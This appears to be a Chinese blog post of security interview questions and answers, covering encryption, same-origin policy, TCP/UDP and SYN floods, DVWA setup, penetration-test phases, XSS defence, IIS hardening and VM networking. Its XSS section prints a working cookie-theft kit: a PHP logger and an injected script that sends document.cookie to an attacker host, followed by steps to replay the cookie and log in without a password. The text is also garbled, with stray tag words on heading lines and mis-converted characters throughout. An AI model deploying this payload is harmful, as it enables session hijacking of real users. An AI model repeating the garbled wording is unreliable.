本篇文章總結涉及如下幾個方面:php
對稱加密非對稱加密?html
什麼是同源策略?前端
cookie存在哪裏?能夠打開嗎mysql
xss如何盜取cookie?sql
tcp、udp的區別及tcp三次握手,syn攻擊?apache
證書要考哪些?瀏覽器
DVWA是如何搭建的?安全
滲透測試的流程是什麼服務器
xss如何防護cookie
IIS服務器應該作哪些方面的保護措施:
虛擬機的幾種鏈接方式及原理
xss有cookie必定能夠無用戶名密碼登陸嗎?
對稱加密非對稱加密?
對稱加密:加解密用同一密鑰,密鑰維護複雜n(n-1)/2,不適合互聯網傳輸密鑰,加解密效率高。應用於加密數據。
非對稱加密:公鑰推不出私鑰,每一個用戶一個非對稱密鑰對就能夠,適合於互聯網傳輸公鑰,可是加密效率低,應用於數字簽名及加密。
什麼是同源策略?
爲了防止不一樣域在用戶瀏覽器中彼此干擾,瀏覽器對從不一樣來源(域)收到的內容進行隔離。
瀏覽器不容許任何舊有腳本訪問一個站點的cookie,不然 ,會話容易被劫持。
只有發佈cookie的站點可以訪問這些cookie,只有經過該站點返回的頁面所包含或加載的JavaScript才能訪問cookie。
cookie存在哪裏?能夠打開嗎
C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Cookies
工具--文件夾選項--查看--將隱藏被保護的文件的對勾去掉就會看到cookies文件夾。
xss如何盜取cookie?
攻擊者代碼:
<?php
$cookie=$_GET['cookie'];
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$cookietxt=fopen('cookie.txt','a');
fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer.""); 注意雙引號,容易出錯
fclose($cookietxt);
?>
腳本端:
<script>
document.write('<img src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');
</script>
獲取到cookie後,用firebug找到cookie,新建cookie
加入cookie,用referer來提交,無需輸入賬號密碼直接登陸進去!
tcp、udp的區別及tcp三次握手,syn攻擊?
也可參考http://www.cnblogs.com/bizhu/archive/2012/05/12/2497493.html
1、tcp、udp區別(轉)
TCP的優勢:
可靠,穩定
TCP的可靠體如今TCP在傳遞數據以前,會有三次握手來創建鏈接,並且在數據傳遞時,有確認、窗口、重傳、擁塞控制機制,在數據傳完後,還會斷開鏈接用來節約系統資源。
TCP的缺點:
慢,效率低,佔用系統資源高,易被攻擊
TCP在傳遞數據以前,要先建鏈接,這會消耗時間,並且在數據傳遞時,確認機制、重傳機制、擁塞控制機制等都會消耗大量的時間,並且要在每臺設備上維護全部的傳輸鏈接,事實上,每一個鏈接都會佔用系統的CPU、內存等硬件資源。
並且,由於TCP有確認機制、三次握手機制,這些也致使TCP容易被人利用,實現DOS、DDOS、CC等攻擊。
UDP的優勢:
快,比TCP稍安全
UDP沒有TCP的握手、確認、窗口、重傳、擁塞控制等機制,UDP是一個無狀態的傳輸協議,因此它在傳遞數據時很是快。沒有TCP的這些機制,UDP較TCP被攻擊者利用的漏洞就要少一些。但UDP也是沒法避免攻擊的,好比:UDP Flood攻擊……
UDP的缺點:
不可靠,不穩定
由於UDP沒有TCP那些可靠的機制,在數據傳遞時,若是網絡質量很差,就會很容易丟包。
基於上面的優缺點,那麼:
何時應該使用TCP:
當對網絡通信質量有要求的時候,好比:整個數據要準確無誤的傳遞給對方,這每每用於一些要求可靠的應用,好比HTTP、HTTPS、FTP等傳輸文件的協議,POP、SMTP等郵件傳輸的協議。
在平常生活中,常見使用TCP協議的應用以下:
瀏覽器,用的HTTP
FlashFXP,用的FTP
Outlook,用的POP、SMTP
Putty,用的Telnet、SSH
QQ文件傳輸
…………
何時應該使用UDP:
當對網絡通信質量要求不高的時候,要求網絡通信速度能儘可能的快,這時就可使用UDP。
好比,平常生活中,常見使用UDP協議的應用以下:
QQ語音
QQ視頻
TFTP
2、TCP握手協議
在TCP/IP協議中,TCP協議提供可靠的鏈接服務,採用三次握手創建一個鏈接。
第一次握手:創建鏈接時,客戶端發送syn包(syn=j)到服務器,並進入SYN_SEND狀態,等待服務器確認;
第二次握手:服務器收到syn包,必須確認客戶的SYN(ack=j+1),同時本身也發送一個SYN包(syn=k),
即SYN+ACK包,此時服務器進入SYN_RECV狀態;
第三次握手:客戶端收到服務器的SYN+ACK包,向服務器發送確認包ACK(ack=k+1),此包發送完畢,
客戶端和服務器進入ESTABLISHED狀態,完成三次握手。
完成三次握手,客戶端與服務器開始傳送數據,在上述過程當中,還有一些重要的概念:
未鏈接隊列:在三次握手協議中,服務器維護一個未鏈接隊列,該隊列爲每一個客戶端的SYN包(syn=j)開設一個條目,
該條目代表服務器已收到SYN包,並向客戶發出確認,正在等待客戶的確認包。這些條目所標識的鏈接在服務器處於Syn_RECV狀態,
當服務器收到客戶的確認包時,刪除該條目,服務器進入ESTABLISHED狀態。 backlog參數:表示未鏈接隊列的最大容納數目。
SYN-ACK 重傳次數 服務器發送完SYN-ACK包,若是未收到客戶確認包,服務器進行首次重傳,等待一段時間仍未收到客戶確認包,
進行第二次重傳,若是重傳次數超過系統規定的最大重傳次數,系統將該鏈接信息從半鏈接隊列中刪除。注意,每次重傳等待的時間不必定相同。
半鏈接存活時間:是指半鏈接隊列的條目存活的最長時間,也即服務從收到SYN包到確認這個報文無效的最長時間,
該時間值是全部重傳請求包的最長等待時間總和。有時咱們也稱半鏈接存活時間爲Timeout時間、SYN_RECV存活時間。
3、SYN攻擊原理
SYN攻擊屬於DOS攻擊的一種,它利用TCP協議缺陷,經過發送大量的半鏈接請求,耗費CPU和內存資源。
SYN攻擊除了能影響主機外,還能夠危害路由器、防火牆等網絡系統,事實上SYN攻擊並無論目標是什麼系統,
只要這些系統打開TCP服務就能夠實施。從上圖可看到,服務器接收到鏈接請求(syn=j),
將此信息加入未鏈接隊列,併發送請求包給客戶(syn=k,ack=j+1),此時進入SYN_RECV狀態。
當服務器未收到客戶端的確認包時,重發請求包,一直到超時,纔將此條目從未鏈接隊列刪除。
配合IP欺騙,SYN攻擊能達到很好的效果,一般,客戶端在短期內僞造大量不存在的IP地址,
向服務器不斷地發送syn包,服務器回覆確認包,並等待客戶的確認,因爲源地址是不存在的,
服務器須要不斷的重發直至超時,這些僞造的SYN包將長時間佔用未鏈接隊列,正常的SYN請求被丟棄,
目標系統運行緩慢,嚴重者引發網絡堵塞甚至系統癱瘓。
證書要考哪些?
信息安全國際第一認證——CISSP
信息安全國內認證——CISAW
信息安全國內認證——CISP
信息安全技術實操認證新貴——Security+
IT審計人員的必備之證——CISA
DVWA是如何搭建的?
啓動xampp(XAMPP(Apache+MySQL+PHP+PERL)是一個功能強大的建站集成軟件包。)下的apache中間件和mysql
將dvwa放到xampp下的htdocs目錄下
在瀏覽器輸入http://127.0.0.1/dvwa 便可使用啦!
還有owasp的漏洞練習平臺:https://sourceforge.net/projects/owaspbwa/files/
滲透測試的流程是什麼
滲透測試流程概述
前期交互階段、情報蒐集階段、威脅建模階段、漏洞分析階段、
滲透攻擊階段(Exploitation)、後滲透攻擊階段(怎麼一直控制,維持訪問)、報告階段。
攻擊前:網絡踩點、網絡掃描、網絡查點
攻擊中:利用漏洞信息進行滲透攻擊、獲取權限
攻擊後:後滲透維持攻擊、文件拷貝、木馬植入、痕跡擦除
xss如何防護
1.對前端輸入作過濾和編碼:
好比只容許輸入指定類型的字符,好比電話號格式,註冊用戶名限制等,輸入檢查須要在服務器端完成,在前端完成的限制是容易繞過的;
對特殊字符進行過濾和轉義;
2.對輸出作過濾和編碼:在變量值輸出到前端的HTML時進行編碼和轉義;
3.給關鍵cookie使用http-only
IIS服務器應該作哪些方面的保護措施:
整理來源:http://www.williamlong.info/archives/118.html
1. 保持Windows升級:
2. 使用IIS防範工具
3. 移除缺省的Web站點
4. 若是你並不須要FTP和SMTP服務,請卸載它們
5. 有規則地檢查你的管理員組和服務:
6. 嚴格控制服務器的寫訪問權限
7. 設置複雜的密碼
8. 減小/排除Web服務器上的共享
9. 禁用TCP/IP協議中的NetBIOS:
10. 使用TCP端口阻塞
11. 仔細檢查*.bat和*.exe 文件: 每週搜索一次*.bat
12. 管理IIS目錄安全:
13. 使用NTFS安全:
14. 管理用戶帳戶
15. 審計你的Web服務器:
虛擬機的幾種鏈接方式及原理
整理來源:http://blog.csdn.net/shuxiao9058/article/details/7051463
安裝完虛擬機後,默認安裝了兩個虛擬網卡,VMnet1和VMnet8,其餘的未安裝(固然也能夠手動安裝其餘的)。其中VMnet1是host網卡,
用於host方式鏈接網絡的。VMnet8是NAT網卡,用於NAT方式鏈接網絡的。它們的IP地址是隨機生成的,若是要用虛擬機作實驗的話,
最好將VMnet1到VMnet8的IP地址改掉。習慣上把VMware虛擬網卡使用的網段"固定",使用以下原則:VMnet1對應的網段是192.168.10.0,
VMnet2對應的網段是192.168.20.0,其餘的相似。固然日常只是隨便用用的就不用改了,能上網就好了。
VMware網絡鏈接的方式主要有:橋接(Bridged)、NAT、主機網絡(Host-Only)。
1. Use bridged networking(使用橋接網絡)
說明:使用VMnet0虛擬交換機,此時虛擬機至關與網絡上的一臺獨立計算機與主機同樣,擁有一個獨立的IP地址,
其網絡拓撲如圖1所示,使用橋接方式,A,A1,A2,B可互訪。
圖1
2. Use network address translation(NAT)
說明:使用Vmnet8虛擬交換機,此時虛擬機能夠經過主機單向網絡上的其餘工做站,其餘工做站不能訪問虛擬機。
其網絡拓撲如圖2所示,使用NAT方式,A1,A2能夠訪問B,但B不能夠訪問A1,A2。但A,A1,A2能夠互訪。
圖2
3. Use Host-Only networking(使用主機網絡)
說明:使用Vmnet1虛擬交換機,此時虛擬機只能與虛擬機、主機互訪。也就是不能上Internet,其網絡拓撲如圖3所示,
使用Host方式,A,A1,A2能夠互訪,但A1,A2不能訪問B,也不能被B訪問。
圖3
xss有cookie必定能夠無用戶名密碼登陸嗎?
基本能夠。由於把cookie的值給瀏覽器,瀏覽器去訪問頁面會用已有的cookie去訪問,若是cookie有效,就會直接進去。
若是有錯誤,歡迎你們批評指正!